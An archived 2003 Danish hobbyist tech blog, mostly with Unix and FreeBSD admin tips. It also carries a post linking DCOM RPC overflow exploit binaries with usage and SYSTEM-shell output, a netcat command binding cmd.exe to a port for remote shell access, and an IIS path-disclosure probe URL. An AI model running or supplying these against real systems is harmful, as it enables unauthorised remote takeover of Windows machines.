UNI-FIX Computer

Samba guide

Udgivet den august 5, 2003 af Valdimirr

http://www.samba.netfirms.com/index.htm
//Vladimirr

Udgivet i Knowledge Base, Links, Old Base | Skriv en kommentar

Mousewheel in Xfree

Udgivet den august 4, 2003 af mike

Add the 'Option      "ZAxisMapping" "4 5"' to your Mouse section, could look like this (on freebsd, might me a little different elsewhere but the zaxis part should be similare)

Section "InputDevice"
        Identifier  "Mouse0"
        Driver      "mouse"
        Option      "ZAxisMapping" "4 5"
        Option      "Protocol" "auto"
        Option      "Device" "/dev/sysmouse"
EndSection

Udgivet i Knowledge Base, Linux, Old Base | Skriv en kommentar

Smb mounts in FreeBSD

Udgivet den juli 30, 2003 af mike

Add the following to your kernel
options         NETSMB
options         SMBFS
options         NETSMBCRYPTO
options         LIBMCHAIN
options         LIBICONV

compile,install, boot

and mount with this cmd

peanut# mount_smbfs -I 192.168.10.122 //mikr@ost/c$ /mnt
Password:

Udgivet i FreeBSD, Knowledge Base, Old Base | Skriv en kommentar

Penetrating windows #2 (dcom rpc bof)

Udgivet den juli 29, 2003 af mike

Files:
Source: http://base.fujang.dk/files/mike/dcom.c (include <error.h> removed)
Freebsd binary: http://base.fujang.dk/files/mike/dcom
Windows binary: http://base.fujang.dk/files/mike/dcom.exe + cygwin1.dll
The windows binary is compilled by padde (www.beastie.dk) modifications has
been made to make it compile under cygwin, the source file avail here was not
used to compile this binary.

Windows usage:

C:\>domc 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>

Unix usage:
bash$ ./dcom 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


The leading zero must be set to one of the following, and describe the target 
system.
-          0    Windows 2000 SP0 (english)
-          1    Windows 2000 SP1 (english)
-          2    Windows 2000 SP2 (english)
-          3    Windows 2000 SP3 (english)
-          4    Windows 2000 SP4 (english)
-          5    Windows XP SP0 (english)
-          6    Windows XP SP1 (english)

Thoug it says english, i have successfully tested this against several danish
versions as well.

You will most likeley have only one shot at this one because the vuln. service
will crash after one try. Also after successfully exploiting this you wont be 
able to exploit again because the services craches. For more information, read the source.

Looks as though the service continue running during the shell, to restart the shell type : net start rpcss , wont help you to start this from the shell, gotta be done afterwards.

Udgivet i Backdoors, Knowledge Base, Old Base, Windows | Skriv en kommentar

Mode switching between layouts

Udgivet den juli 26, 2003 af gecko

As most danish hackers have discovered, DK keyboard layout really sucks when it comes to programming/codehacking. But running entirely using US keyboard layout doesn't work either, because you need to write the Danish special characters, æ, ø, and å.
There is, however, a solution to this. It requires you to run Xfree86 version 4.2.0 or later.
In the XF86Config file,
Set the layout to us,dk
and as options use grp:caps_toggle .
You can also use it as a command in your .xinitrc or .xsession file, then the syntax is setxkbmap -rules xfree86 -layout "us,dk" -option "grp:caps_toggle".

Udgivet i Knowledge Base, Linux, Old Base, Workstation | Skriv en kommentar

Source audit

Udgivet den juli 24, 2003 af mike

IF you have the source code you can check out the following links: 
http://www.dwheeler.com/flawfinder/ 
http://www.cigital.com/its4/ 
http://www.securesoftware.com/download_form_rats.htm 
http://www.cs.wisc.edu/~bart/fuzz/fuzz.html (MAYBE?) 
ELSIF YOU ONLY HAVE THE BINARY THEN 
Checkout the blackhat presintations like: 
http://www.blackhat.com/html 
/bh-europe-00/bh-europe-00-speakers.html#HalVar

Udgivet i Knowledge Base, Links, Old Base | Skriv en kommentar

Remove ^M from windoze files

Udgivet den juli 24, 2003 af mike

Taken from FreeBSD quotes

Need to remove all those ^M characters from a DOS file? Try

        col -bx < dosfile > newfile

Udgivet i FreeBSD, Knowledge Base, Old Base | Skriv en kommentar

Network Programming in C

Udgivet den juli 23, 2003 af secor

An easy guide to network programming in C:

http://tinyurl.com/685d

/secor

Udgivet i Knowledge Base, Networking, Old Base, Programmering | Skriv en kommentar

IIS Vuln.

Udgivet den juli 22, 2003 af mike

http://1.0.0.13/_vti_bin/shtml.exe/postinfo1.html

svarer med:
"c:\inetpub\wwwroot\postinfo1.html" kan ikke åbnes: Filen eller mappen findes ikke.

Udgivet i Knowledge Base, Old Base, Windows | Skriv en kommentar

Bind shell in windows

Udgivet den juli 22, 2003 af mike

nc -L -d -e cmd.exe -p 8080

Will bind a cmd.exe to port 8080

root@camp:~# telnet 1.0.0.13 8080
Trying 1.0.0.13...
Connected to 1.0.0.13.
Escape character is '^]'.
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\>whoami
whoami
HONEYPOT\Administrator


nc and whoami are programs installed by my, and not default windoze aps

Udgivet i Knowledge Base, Networking, Old Base, Windows, Workstation | Skriv en kommentar